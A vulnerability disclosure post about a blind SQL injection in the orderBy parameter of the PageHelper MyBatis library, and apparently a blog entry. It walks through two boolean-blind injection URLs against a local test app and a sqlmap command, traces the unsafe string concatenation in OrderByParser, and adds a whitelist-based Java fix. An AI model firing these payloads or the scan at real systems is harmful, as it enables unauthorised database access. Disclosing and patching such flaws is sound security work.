Pagehelper has a SQL injection vulnerability validation process

Note: A Boolean-based blind and time-based blind SQL injection vulnerability exists in the orderBy parameter of PageHelper.

Official website: https://pagehelper.github.io/

Source code: https://github.com/pagehelper/Mybatis-PageHelper

Git: https://github.com/pagehelper/Mybatis-PageHelper.git

Verification Process:

1. Local environment: SpringBoot + MyBatis + Maven + MySQL

2. Visit the page that takes the sort parameter orderBy

3. Visit URL: http://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=(SELECT (CASE WHEN (1=1)THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))

4. Visit URL: http://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=(SELECT (CASE WHEN (1=2)THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))

5. Scan using sqlmap, command: python3 sqlmap.py -u "http://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=costprice*" --batch --dbms=mysql

Source Code Review:

1. The converToOrderBySql function in \com\github\pagehelper\parser\OrderByParser.java concatenates the mapper's SQL statement with pageNum, pageSize and orderBy.

2. The function directly concatenates the mapper SQL statement [select * from book] with the value submitted in the orderBy parameter [(SELECT (CASE WHEN (1=1) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))].

3. The value returned by converToOrderBySql is assigned to sql: sql = SELECT * FROM book order by (SELECT (CASE WHEN (1=1) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))

4. GetPageSql then concatenates sql with LIMIT to form the final query statement.

5. In MySQL you can view the history of executed SQL statements and see that the value submitted in the orderBy parameter is placed into the query verbatim: [ SELECT * FROM book order by (SELECT (CASE WHEN (1=2) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END)) LIMIT 10 ]
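A defensive counterpart to the concatenation shown above, added here as an example and not code from the original post or from the PageHelper project: the controller validates the orderBy request parameter against a whitelist of column names plus an optional ASC/DESC before calling PageHelper.startPage, so a value like the CASE/UNION payload above is rejected before any SQL is built. It assumes Java 11+ and a book table with columns id, name and costprice; PageHelper.startPage(int, int) and startPage(int, int, String) are the library's real overloads.

```java
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import com.github.pagehelper.PageHelper;

// Added example, not PageHelper's own code: the request's orderBy value is mapped onto a
// fixed set of column names before it reaches PageHelper, which otherwise concatenates the
// string verbatim into "ORDER BY ...". Table and column names are assumptions.
public final class SafeOrderBy {
    // Columns of the (assumed) book table that clients may sort by.
    private static final Set<String> ALLOWED_COLUMNS = Set.of("id", "name", "costprice");
    // Accepts "column" or "column asc|desc"; parentheses, SELECT, commas etc. cannot match.
    private static final Pattern SHAPE =
            Pattern.compile("^([a-z_]+)(?:\\s+(asc|desc))?$", Pattern.CASE_INSENSITIVE);

    /** Returns a clean ORDER BY clause, null for "no sort", or throws for anything else. */
    public static String validate(String orderBy) {
        if (orderBy == null || orderBy.isBlank()) return null;
        Matcher m = SHAPE.matcher(orderBy.trim());
        if (!m.matches()) {
            throw new IllegalArgumentException("orderBy has an unexpected shape");
        }
        String column = m.group(1).toLowerCase();
        if (!ALLOWED_COLUMNS.contains(column)) {
            throw new IllegalArgumentException("orderBy column not allowed: " + column);
        }
        return m.group(2) == null ? column : column + " " + m.group(2).toUpperCase();
    }

    /** Hypothetical controller helper: validate first, then hand the clean value to PageHelper. */
    public static void startValidatedPage(int pageNum, int pageSize, String orderBy) {
        String safe = validate(orderBy);
        if (safe == null) {
            PageHelper.startPage(pageNum, pageSize);
        } else {
            PageHelper.startPage(pageNum, pageSize, safe);
        }
    }

    public static void main(String[] args) {
        // The boolean-blind payload from the steps above is rejected before any SQL is built.
        String payload = "(SELECT (CASE WHEN (1=1) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))";
        try {
            validate(payload);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Because the clause is rebuilt from the matched column name and direction rather than passed through, even inputs that merely "look like" a column (for example the sqlmap marker costprice*) never reach the ORDER BY string.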


Posted 2022-03-26 23:14 by 睡不醒,好烦啊